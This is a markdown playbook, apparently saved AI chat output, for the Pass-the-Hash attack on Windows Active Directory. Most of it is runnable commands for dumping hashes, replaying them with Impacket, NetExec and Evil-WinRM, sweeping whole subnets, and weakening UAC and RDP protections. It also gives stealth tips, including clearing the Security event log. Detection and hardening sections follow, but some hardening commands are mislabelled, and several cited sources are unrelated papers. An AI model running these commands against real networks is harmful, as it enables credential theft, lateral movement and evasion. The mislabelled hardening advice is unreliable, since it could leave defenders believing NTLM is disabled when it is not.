attack-4-pass-the-hash-pth.md (27834B)
1 --- 2 title: "Attack #4 β Pass-the-Hash (PtH)" 3 description: "Pass-the-Hash is a credential replay attack that exploits a fundamental design characteristic of the NTLM authentication protocol. When Windowsβ¦" 4 category: active-directory 5 subcategory: "Credential Access" 6 tags: ["active-directory", "ntlm", "hashing"] 7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "Hashcat"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-One/π΄ Attack #4 β Pass-the-Hash (PtH).md" 11 --- 12 # π΄ Attack #4 β Pass-the-Hash (PtH) 13 14 *** 15 16 ## π How It Works 17 18 Pass-the-Hash is a **credential replay attack** that exploits a fundamental design characteristic of the NTLM authentication protocol. When Windows authenticates a user, it never actually transmits the plaintext password β instead it uses the **NT hash** (MD4 of the Unicode password) directly in the NTLM challenge-response handshake. This means that possessing the hash is **cryptographically equivalent to possessing the password** β no cracking required. 19 20 The attacker first compromises any Windows host, dumps NTLM hashes from LSASS memory or the SAM database, then **injects that hash directly into a new authentication context** and authenticates to remote systems as the victim user. Because the remote system has no way to distinguish a hash supplied by the legitimate user from one supplied by an attacker, access is granted immediately. The attack has existed since 1997 and has **no CVE and no patch** β it is a consequence of how NTLM was designed. 21 22 > β οΈ **Windows Server 2022+ Behaviour / Credential Guard Impact:** Modern Windows 10/11 and Server 2022+ with Credential Guard enabled **completely block LSASS hash extraction**. Mimikatz will fail with `ERROR kuhl_m_sekurlsa_getHandle` when trying to access LSASS on Credential Guard-protected systems. However, PtH still works perfectly if you already have the hash from another source (SAM, NTDS.dit, or another non-Credential-Guard host). LSA protection (RunAsPPL) also blocks LSASS access but is less comprehensive than Credential Guard. Remote Credential Guard on Server 2016+ blocks PtH over WinRM (5985), but SMB (445) and RDP (3389) may still work depending on registry configuration. 23 24 **Chains with:** Attack #3 (AS-REP roasting recovers passwords which you then hash to PtH), Attack #5 (PtH + Kerberos = Overpass-the-Hash), Attack #7 (NTLM relay to capture hashes) 25 26 ### The Full Attack Flow 27 28 ``` 29 1. Gain initial foothold on any Windows machine (phishing, exploit, etc.) 30 2. Escalate to local admin / SYSTEM on that machine 31 3. Dump NTLM hashes from: 32 - LSASS process memory (sekurlsa::logonpasswords via Mimikatz) 33 - SAM database (reg save + secretsdump) 34 - NTDS.dit (domain-wide dump from DC) 35 4. Identify high-value hash (Domain Admin, local admin reuse, service account) 36 5. Inject hash into new authentication session (Mimikatz / impacket / NetExec) 37 6. Authenticate to remote systems as victim β lateral movement achieved 38 7. Repeat: dump new hashes from each compromised host, escalate further 39 ``` 40 41 ### NTLM Hash Formats β Know Your Targets 42 43 | Format | Example | Notes | 44 |---|---|---| 45 | **NT hash only** | `aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c` | Most common β LM:NT format | 46 | **LM hash** | `aad3b435b51404eeaad3b435b51404ee` | Effectively blank β LM disabled by default since Vista | 47 | **NT hash only** | `8846f7eaee8fb117ad06bdd830b7586c` | The part that matters β right side of the colon | 48 | **NTLM relay capture** | Full Net-NTLMv1/v2 | **Cannot** be used for PtH directly β must be relayed or cracked | 49 50 > β οΈ **Critical distinction:** You **can** Pass-the-Hash with the **NT hash** (from LSASS/SAM/NTDS). You **cannot** Pass-the-Hash with a **Net-NTLMv2** hash captured from Responder β those must be cracked or relayed (see Attack #7). 51 52 *** 53 54 ## βοΈ Prerequisites 55 56 | Requirement | Detail | 57 |---|---| 58 | **Local admin / SYSTEM on a host** | Required to dump LSASS or access SAM β standard user cannot read these | 59 | **NTLM authentication enabled** | Target must accept NTLM β if Kerberos-only is enforced, use Overpass-the-Hash instead | 60 | **Network access to target** | Ports 445 (SMB), 135 (RPC), 5985 (WinRM) depending on tool | 61 | **Target has same credentials** | Hash must be valid on the remote system (domain account or local admin reuse) | 62 | **UAC remote restrictions** | Local admin PtH blocked by `LocalAccountTokenFilterPolicy` unless the built-in RID-500 admin account is used | 63 64 *** 65 66 ## π οΈ Tools 67 68 | Tool | Platform | Protocol | Notes | 69 |---|---|---|---| 70 | **Mimikatz** | Windows | NTLM | Gold standard; `sekurlsa::pth` spawns a new process with injected hash | 71 | **Impacket suite** | Linux | SMB/RPC | `psexec.py`, `smbexec.py`, `wmiexec.py` all support `-hashes` flag | 72 | **NetExec / CrackMapExec** | Linux | SMB/WinRM/LDAP | Best for mass lateral movement across subnets | 73 | **Evil-WinRM** | Linux | WinRM (5985) | Clean interactive shell via PtH over WinRM | 74 | **xfreerdp** | Linux | RDP (3389) | PtH over RDP with Restricted Admin Mode enabled | 75 | **Metasploit** | Both | SMB | `exploit/windows/smb/psexec` + `pass_the_hash` module | 76 | **pth-winexe / pth-smbclient** | Linux | SMB | Legacy Kali tools; still effective for quick access | 77 | **lsassy.py** | Linux | Network-based | Remotely extracts hashes from LSASS without local admin shell | 78 79 *** 80 81 ## π» Full Commands 82 83 ### π΅ Step 0 β Dump NTLM Hashes (Hash Acquisition Phase) 84 85 ```powershell 86 # ββ Mimikatz on compromised Windows host ββββββββββββββββββββββββββββββββββββββ 87 88 # Dump all credentials from LSASS memory (requires local admin) 89 privilege::debug 90 sekurlsa::logonpasswords 91 92 # Dump only NTLM hashes (faster, less noise) 93 sekurlsa::msv 94 95 # Dump SAM database (local account hashes β works offline too) 96 token::elevate 97 lsadump::sam 98 99 # Dump domain hashes via DCSync (if you have replication rights) 100 lsadump::dcsync /domain:corp.local /user:Administrator 101 lsadump::dcsync /domain:corp.local /all /csv 102 ``` 103 104 ```bash 105 # ββ Linux β remote SAM/NTDS dump via Impacket βββββββββββββββββββββββββββββββββ 106 107 # Dump SAM from remote machine (requires local admin creds or hash) 108 secretsdump.py corp.local/Administrator:'Password1'@10.10.10.10 109 110 # Dump using existing NT hash (PtH to get more hashes) 111 secretsdump.py corp.local/Administrator@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c 112 113 # Dump all domain hashes from DC (NTDS.dit via VSS) 114 secretsdump.py corp.local/Administrator:'Password1'@10.10.10.10 -just-dc-ntlm 115 116 # Output to file 117 secretsdump.py corp.local/Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c -outputfile domain_hashes 118 ``` 119 120 *** 121 122 ### π΄ Mimikatz β Pass-the-Hash (Windows, Spawn New Process) 123 124 ```powershell 125 # Classic PtH β spawns cmd.exe as target user with injected hash 126 # (Opens a new window authenticated as that user) 127 sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c 128 129 # PtH with specific program (e.g., PowerShell) 130 sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:powershell.exe 131 132 # PtH for local admin (use local machine name instead of domain) 133 sekurlsa::pth /user:Administrator /domain:WORKSTATION01 /ntlm:8846f7eaee8fb117ad06bdd830b7586c 134 135 # Then from the spawned shell β verify access and move laterally 136 dir \\10.10.10.20\C$ 137 Enter-PSSession -ComputerName 10.10.10.20 138 ``` 139 140 *** 141 142 ### π΄ Impacket β Linux (Most Versatile Toolkit) 143 144 ```bash 145 # ββ psexec.py β SMB exec, spawns SYSTEM shell βββββββββββββββββββββββββββββββββ 146 psexec.py corp.local/Administrator@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c 147 148 # NT hash only (left side can be blank or aad3b... placeholder) 149 psexec.py Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c 150 151 # ββ smbexec.py β no binary drop on disk (stealthier than psexec) ββββββββββββββ 152 smbexec.py corp.local/Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c 153 154 # ββ wmiexec.py β WMI-based execution (no service creation) βββββββββββββββββββ 155 wmiexec.py corp.local/Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c 156 157 # ββ atexec.py β Task Scheduler execution (avoids SMB pipe artifacts) βββββββββ 158 atexec.py corp.local/Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c whoami 159 160 # ββ smbclient.py β browse file shares as target user βββββββββββββββββββββββββ 161 smbclient.py corp.local/Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c 162 ``` 163 164 *** 165 166 ### π΄ NetExec / CrackMapExec β Linux (Mass Lateral Movement) 167 168 ```bash 169 # Single target PtH via SMB 170 nxc smb 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c 171 172 # Full hash format (LM:NT) 173 nxc smb 10.10.10.10 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c 174 175 # Subnet sweep β find all machines where hash is valid local admin 176 nxc smb 10.10.10.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c --local-auth 177 178 # Domain-wide sweep 179 nxc smb 10.10.10.0/24 -u corp_admin -H 8846f7eaee8fb117ad06bdd830b7586c 180 181 # Execute a command on all matching hosts 182 nxc smb 10.10.10.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c -x whoami 183 184 # Dump SAM from all compromised hosts in one sweep 185 nxc smb 10.10.10.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c --sam 186 187 # Dump LSA secrets (service account creds, DPAPI keys) 188 nxc smb 10.10.10.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c --lsa 189 190 # WinRM PtH (port 5985) β interactive shell 191 nxc winrm 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c 192 ``` 193 194 *** 195 196 ### π΄ Evil-WinRM β Linux (Clean Interactive Shell) 197 198 ```bash 199 # PtH over WinRM β gives a clean PowerShell-like shell 200 evil-winrm -i 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c 201 202 # With domain specified 203 evil-winrm -i 10.10.10.10 -u corp.local\\Administrator -H 8846f7eaee8fb117ad06bdd830b7586c 204 205 # Load PowerShell scripts on connect 206 evil-winrm -i 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c \ 207 -s /opt/PowerSploit/Privesc/ 208 ``` 209 210 *** 211 212 ### π΄ xfreerdp β RDP via Pass-the-Hash (Restricted Admin Mode) 213 214 ```bash 215 # PtH over RDP β requires Restricted Admin Mode enabled on target 216 # (enabled by default on Server 2012R2+, or manually via registry key) 217 xfreerdp /v:10.10.10.10 /u:Administrator /pth:8846f7eaee8fb117ad06bdd830b7586c /d:corp.local +compression /dynamic-resolution 218 219 # Enable Restricted Admin Mode on target first (if you have access via another method) 220 # (Run on target machine) 221 reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f 222 ``` 223 224 *** 225 226 ### π΄ lsassy.py β Remote LSASS Credential Extraction (No Shell Required) 227 228 ```bash 229 # Extract hashes directly from remote LSASS without interactive shell 230 lsassy 10.10.10.10 -u low_user -p 'Password1' 231 232 # Using existing hash (PtH into LSASS extraction) 233 lsassy 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c 234 235 # Dump to file for batch processing 236 lsassy 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c -o hashes_from_remote.txt 237 238 # Note: lsassy bypasses LSASS access restrictions in some cases by using DCSync-like RPC calls 239 ``` 240 241 *** 242 243 ### π΄ UAC & LocalAccountTokenFilterPolicy β Handling PtH Blocks 244 245 ```bash 246 # By default, non-RID500 local admins are blocked from PtH via SMB 247 # (UAC remote restriction β Token Filtering Policy) 248 249 # Fix 1 β Enable LocalAccountTokenFilterPolicy on target (if you have a shell) 250 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System \ 251 /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f 252 253 # Fix 2 β Use the built-in RID-500 Administrator account (not subject to UAC filtering) 254 # The built-in Administrator (SID ending in -500) bypasses this restriction automatically 255 256 # Fix 3 β Use domain accounts instead of local accounts 257 # Domain admin accounts are never subject to UAC remote filtering 258 ``` 259 260 *** 261 262 ### π΄ Credential Guard Bypass Attempts (Note: Most Don't Work) 263 264 ```bash 265 # β οΈ IMPORTANT: These attempts are mostly ineffective against modern Credential Guard 266 # They are listed for awareness and educational purposes only 267 268 # Attempt 1 β Use lsassy with Direct Approach (limited success) 269 lsassy -t wdigest 10.10.10.10 -u low_user -p 'Password1' 270 # Result: May fail with "Failed to get handle on LSASS" if Credential Guard is active 271 272 # Attempt 2 β Dump via ntlmrelayx (relay attack, not direct extraction) 273 # This works against NTLM relay targets, NOT against Credential Guard itself 274 ntlmrelayx.py -t smb://10.10.10.10 275 276 # Attempt 3 β Use PtH with Kerberos (Overpass-the-Hash) instead 277 # If target allows Kerberos, convert NT hash β TGT and bypass NTLM entirely (see Attack #5) 278 Rubeus.exe asktgt /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c /outfile:ticket.kirbi 279 280 # NOTE: No direct bypass for Credential Guard exists. Mitigations: 281 # - Use already-compromised pre-Credential-Guard hosts as pivot points 282 # - Perform DCSync if you have replication rights (domain-level, not LSASS) 283 # - Target systems that don't have Credential Guard enabled (older workstations) 284 ``` 285 286 *** 287 288 ## π§© Troubleshooting 289 290 | Error | Cause | Fix | 291 |---|---|---| 292 | **`STATUS_LOGON_FAILURE` / `STATUS_ACCESS_DENIED`** | Hash is invalid for this user or wrong domain. | Verify the hash is correct. Check spelling of username and domain. Try hash on a different target where you know it's valid (test with SAM first). | 293 | **`ERROR kuhl_m_sekurlsa_getHandle: 0x00000005`** | Credential Guard enabled on target; cannot access LSASS. | Credential Guard is active and blocks LSASS extraction. Use hashes from another source (SAM, NTDS, or a non-Credential-Guard host) to PtH into this system instead. Or pivot to Overpass-the-Hash (Kerberos). | 294 | **`LSA Protection (RunAsPPL) prevented LSASS access`** | Process Protection Light is enabled, blocking Mimikatz. | Switch to secretsdump via SMB instead: `secretsdump.py corp.local/admin@target -hashes :hash`. Or use lsassy for remote extraction. | 295 | **`Access denied / UAC remote restriction`** | LocalAccountTokenFilterPolicy blocks local admin PtH. | Use the built-in RID-500 Administrator account instead of a custom local admin. Or set `LocalAccountTokenFilterPolicy=1` on target (requires shell first). Domain accounts bypass this. | 296 | **`Restricted Admin Mode not enabled on RDP target`** | xfreerdp PtH requires Restricted Admin Mode. | Enable on target: `reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0x0`. Or use SMB/WinRM instead of RDP. | 297 | **`No such file or directory: secretsdump.py`** | Impacket not installed or path incorrect. | Install: `pip install impacket --upgrade`. Check Python PATH: `which secretsdump.py`. | 298 | **`Socket timeout / Connection refused on port 445`** | SMB port filtered or host offline. | Check connectivity: `nc -zv 10.10.10.10 445`. Verify host is online. Check firewall rules. Try different access method (WinRM on 5985, RDP on 3389). | 299 | **`NTLM relay hash captured from Responder (Net-NTLMv2)`** | You have a relay hash, not an NT hash β PtH won't work directly. | Crack the hash first: `hashcat -m 5600 relay_hash.txt rockyou.txt`. Or relay it (NTLM relay, Attack #7). PtH requires NT hashes only. | 300 | **`WinRM (5985) authentication fails but SMB (445) works`** | Remote Credential Guard may be blocking WinRM. | Remote Credential Guard blocks PtH over WinRM (5985) on Server 2016+. Use SMB (445) instead with `psexec.py`, `smbexec.py`, or `nxc smb`. | 301 302 *** 303 304 ## π― OPSEC Tips 305 306 ### OpSec Ranking (Stealthiest to Loudest) 307 308 1. **`wmiexec.py` over single host** (stealthiest) β WMI, no service creation, minimal artifacts 309 2. **`atexec.py` for single commands** β Task Scheduler, fast cleanup, low footprint 310 3. **`smbexec.py` for shell** β SMB service, no binary drop, moderate artifacts 311 4. **Mimikatz local PtH (interactive)** β Process injection, visible process list 312 5. **`psexec.py` spray across subnet** (loudest) β Service binary drop, obvious SMB activity, mass 4688 events 313 314 ### Modern Defence Impact 315 316 - **Credential Guard** β blocks LSASS hash extraction entirely. Dumping becomes impossible from that host, but PtH still works using pre-dumped hashes. 317 - **SMB Signing + Enforcement** β if enabled, some attacks are blocked. Kerberos PtH (Overpass-the-Hash) becomes necessary. 318 - **Windows Defender + Sysmon** β Mimikatz binary execution is often caught. In-memory LOLBins or living-off-the-land techniques avoid this. 319 - **Network segmentation** β if properly configured, lateral movement is blocked even with valid hashes. 320 321 ### Opsec Best Practices 322 323 - **`wmiexec.py` over `psexec.py`** β psexec creates a service and drops a binary to disk; wmiexec uses WMI and leaves significantly fewer artefacts 324 - **`smbexec.py`** β runs commands via SMB service creation but never writes a binary; good middle ground 325 - **Prefer `atexec.py`** for single command execution β uses Task Scheduler, minimal footprint 326 - **Don't spray hashes across the entire subnet** unless necessary β multiple 4624 Type 3 events from one source IP is a clear detection signal 327 - **Use domain admin hashes carefully** β authentication events from a DA account hitting multiple systems simultaneously triggers most modern SIEMs 328 - **Target local admin reuse first** β a recycled local admin hash across 50 workstations is gold for lateral movement with less scrutiny than DA activity 329 - **Clear event logs after PtH** if persistence isn't the goal: `wevtutil cl Security` (noisy, but useful) 330 331 *** 332 333 ## π‘οΈ Detection β Event IDs 334 335 | Event ID | Source | What to Look For | 336 |---|---|---| 337 | **4624** | Security Log | Successful logon β **Logon Type 3** (network) with **NtLmSsp** as authentication package | 338 | **4624** | Security Log | Type 9 logon (NewCredentials) β Mimikatz `sekurlsa::pth` spawns this | 339 | **4648** | Security Log | Logon with explicit credentials β attacker injecting hash to remote system | 340 | **4672** | Security Log | Special privileges assigned to new logon (DA/local admin access) | 341 | **4776** | Security Log | DC attempted to validate NTLM credentials β `Status 0x0` = success | 342 | **7045** | System Log | New service installed β `psexec.py` creates a service; look for random-name binaries | 343 | **Sysmon EID 1** | Sysmon | Process creation β `lsass.exe` being accessed by non-system processes | 344 | **Sysmon EID 10** | Sysmon | `ProcessAccess` β Mimikatz opens LSASS with `PROCESS_VM_READ` access | 345 346 **Primary detection signature:** Event 4624 with `LogonType: 3`, `AuthenticationPackage: NTLM`, and `WorkstationName` / `IpAddress` pointing to a machine where that user has no business authenticating from. Sysmon Event 10 for LSASS access is the earliest indicator β catching the dump phase before the pass even occurs. 347 348 ### Additional Sysmon Event IDs 349 350 | Event ID | Detection | 351 |---|---| 352 | **Sysmon 8** | CreateRemoteThread into process (hash injection by Mimikatz) | 353 | **Sysmon 11** | File creation on target system (binary drop from psexec or service binary) | 354 | **Sysmon 17** | PipeCreated (SMB pipes for service execution) | 355 | **Sysmon 18** | PipeConnected (attacker connecting to named pipes) | 356 357 ### Sigma Rule References 358 359 - **Sigma rule:** `credential_access_ntlm_relay_ntlmssp` β detects NTLM authentication from unusual sources 360 - **Sigma rule:** `lateral_movement_remote_services` β monitors for WMI/SMB lateral movement patterns 361 - **Sigma rule:** `privilege_escalation_local_admin_check` β flags sudden admin access from non-admin accounts 362 - Link: https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pass_the_hash.yml 363 364 ### EDR Detections 365 366 - **Microsoft Defender for Identity:** Pass-the-Hash detection (abnormal logon type + NTLM from unexpected source) β flags hash-based auth 367 - **CrowdStrike Falcon:** Detects Mimikatz via behavioral heuristics (LSASS access + credential dumping pattern) 368 - **Elastic Security:** Hunt rule `credential_access_pass_the_hash_ntlm` β correlates LSASS access + NTLM logon 369 - **Sysmon + SIEM correlations:** Sysmon 10 (LSASS access) followed by 4624 Type 3 logon = PtH in progress 370 371 ### Hardening Commands 372 373 ```powershell 374 # Disable NTLM across domain (force Kerberos-only β breaks backward compat) 375 # (Domain-wide GPO setting) 376 Set-GPRegistryValue -Name "Default Domain Policy" \ 377 -Key "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" \ 378 -ValueName "RestrictAnonymous" -Type DWord -Value 2 379 380 # Enable Credential Guard (prevents LSASS hash extraction) 381 # Server 2016+ / Win10+ with TPM 2.0 382 Invoke-CimMethod -ClassName Win32_DeviceGuard -MethodName Enable -Arguments @{HypervisorManagedCodeIntegrityEnforcementPolicy = 1} 383 384 # Enable LSA Protection (RunAsPPL β blocks LSASS direct access) 385 # Windows 8.1+ / Server 2012 R2+ 386 reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 1 /f 387 388 # Enforce SMB Signing (blocks some NTLM relay attacks) 389 # (GPO path: Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies) 390 Set-SmbServerConfiguration -RequireSecuritySignature $true -Force 391 392 # Monitor for LSASS access attempts 393 # (Enable advanced audit policy) 394 auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable 395 396 # Disable WDIGEST (removes cleartext password from LSASS) 397 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f 398 ``` 399 400 *** 401 402 ## πΊοΈ MITRE ATT&CK 403 404 | Tactic | Technique ID | Sub-technique | Observed in | Platforms | Data Sources | 405 |---|---|---|---|---|---| 406 | Lateral Movement | T1550 | **002** (PtH) | APT1, APT28, Wizard Spider, FIN7, Carbanak | Windows | Authentication logs (4624, 4776), Sysmon EID 10 (Process Access), Network traffic (SMB/RPC) | 407 408 **T1550.002 β Use Alternate Authentication Material: Pass the Hash** β Leverages NTLM hash to authenticate without plaintext password. Works on all Windows versions supporting NTLM (which is all of them, for backward compatibility). 409 410 *** 411 412 ## π Attack Chain Context 413 414 ``` 415 [Pass-the-Hash] βββ Authenticated Session on Remote Host as Victim User 416 β 417 ββββ π Dump LSASS on new host β more hashes β repeat loop 418 ββββ π« Overpass-the-Hash (convert NT hash β Kerberos TGT) 419 ββββ π©Έ DCSync (if DA hash obtained β dump all domain hashes) 420 ββββ π« Golden Ticket (KRBTGT hash from DCSync β permanent persistence) 421 ββββ π Access file shares, databases, email as privileged user 422 ββββ π― Find DA cached logon on compromised workstation β instant DA 423 ``` 424 425 **The lateral movement loop:** Compromise host β dump hashes β PtH to next host β find higher-privilege hash β repeat until Domain Admin is reached. In a flat network without segmentation, this loop can take **under 10 minutes** from first workstation compromise to Domain Admin. The technique works on any Windows version and requires no exploits β just valid hashes and network access. 426 427 *** 428 429 > β **Attack #4 β Pass-the-Hash complete.** Tell me to move on when you're ready for **Attack #5 β Pass-the-Ticket (PtT)**. 430 431 Sources 432 What is a Pass-the-Hash Attack? | CrowdStrike https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/pass-the-hash-attack/ 433 What is a Pass-the-Hash Attack (PtH)? | BeyondTrust https://www.beyondtrust.com/resources/glossary/pass-the-hash-pth-attack 434 What is Pass-the-Hash? Attacks Types and Security Best Practices https://www.vaadata.com/blog/what-is-pass-the-hash-attacks-types-and-security-best-practices/ 435 What are Pass-the-Hash (PtH) & Pass-the-Ticket (PtT)? https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-are-pass-the-hash-pth-pass-the-ticket-ptt/ 436 Active Directory Attacks: Pass-the-Hash, Pass-the-Ticket & Qualys ETM ... https://blog.qualys.com/product-tech/2026/02/11/qualys-etm-detect-pass-the-hash-pass-the-ticket-attacks 437 Understanding Pass-the-Hash: How Attackers Exploit https://www.hedgehogsecurity.co.uk/blog/understanding-pass-the-hash-attack-how-hackers-exploit-password-vulnerabilities 438 Detecting Pass-the-Hash Attack in a Microsoft Active Directory Environment using an Open-Source Approach https://ieeexplore.ieee.org/document/10795633/ 439 An Open-Source Approach to Detect Pass-the-Hash Attack in Active Directory Using Wazuh and Sysmon https://link.springer.com/10.1134/S0361768825700483 440 Pass the Hash Attack Defense | AD Security 101 https://www.semperis.com/blog/how-to-defend-against-pass-the-hash-attack/ 441 Pass the hash - Wikipedia https://en.wikipedia.org/wiki/Pass_the_hash 442 What Is a Pass the Hash Attack? | Proofpoint USwww.proofpoint.com βΊ threat-reference βΊ pass-the-hash https://www.proofpoint.com/us/threat-reference/pass-the-hash 443 An Expert Guide to Mitigating Pass-the-Hash Attacks in Active Directory https://www.nccgroup.com/research/defending-your-directory-an-expert-guide-to-mitigating-pass-the-hash-attacks-in-active-directory/ 444 What is a Pass-the-Hash Attack (PtH)? PtH Explained https://www.xcitium.com/knowledge-base/pth/ 445 Threat overview https://www.semperis.com/blog/pass-the-hash-attack-explained/ 446 Identifying and Preventing... https://www.strongdm.com/what-is/pass-the-hash-attack-pth 447 Pass the Hash: Mechanics and Mitigation https://nordpass.com/blog/pass-the-hash-attack/ 448 Pass the Hash and Credential Theft https://download.microsoft.com/download/C/5/7/C57FB17E-620C-46AD-BC3E-4A8064273669/Aaron_Margosis_Pass_the_hash.pdf 449 Pass-the-Hash in Windows 10 GIAC ( GCIH ) Gold Certification https://www.semanticscholar.org/paper/ca3bdcf7802e8d834f52845a0eb3b953111971f5 450 Pass-the-Hash in Windows 10 https://www.semanticscholar.org/paper/59c5ac8c084e13433f4d56703dee90eb25736194 451 Pass-the-Hash: One of the Most Prevalent Yet Underrated Attacks for Credentials Theft and Reuse https://dl.acm.org/doi/10.1145/3134302.3134338 452 Defeating Pass-the-Hash Separation of Powers https://www.semanticscholar.org/paper/a6ffa297b6c915f3056c207c55f9a99f299350e2 453 Improved Preimage Attack on 3-Pass HAVAL https://www.semanticscholar.org/paper/e33983337beb98d51dbab233206d8d1a9243bf0a 454 Improved preimage attack on 3-pass HAVAL http://link.springer.com/10.1007/s12204-011-1215-3 455 Enhanced Multi-Chaotic Fredkin-Logic-Based Image Encryption for Satellite Imagery with Adaptive Hash-Driven Key Generation https://bajest.bauc14.edu.iq/index.php/bajest/article/view/179 456 Some Cryptanalytic Results on Zipper Hash and Concatenated Hash https://www.semanticscholar.org/paper/9637504875342b0467aada6de710346971270459 457 PTHash: Revisiting FCH Minimal Perfect Hashing http://arxiv.org/pdf/2104.10402.pdf 458 Recovering cryptographic keys from partial information, by example https://cic.iacr.org/p/1/1/28/pdf 459 CASH: A Cost Asymmetric Secure Hash Algorithm for Optimal Password Protection http://arxiv.org/pdf/1509.00239.pdf 460 The Spy in the Sandbox -- Practical Cache Attacks in Javascript http://arxiv.org/pdf/1502.07373v2.pdf 461 Exploiting Leakage in Password Managers via Injection Attacks http://arxiv.org/pdf/2408.07054.pdf 462 Cost-Asymmetric Memory Hard Password Hashing http://arxiv.org/pdf/2206.12970.pdf 463 Passive SSH Key Compromise via Lattices https://dl.acm.org/doi/pdf/10.1145/3576915.3616629 464 Covert Channels in One-Time Passwords Based on Hash Chains https://zenodo.org/record/5999651/files/EICC_2020_Poster.pdf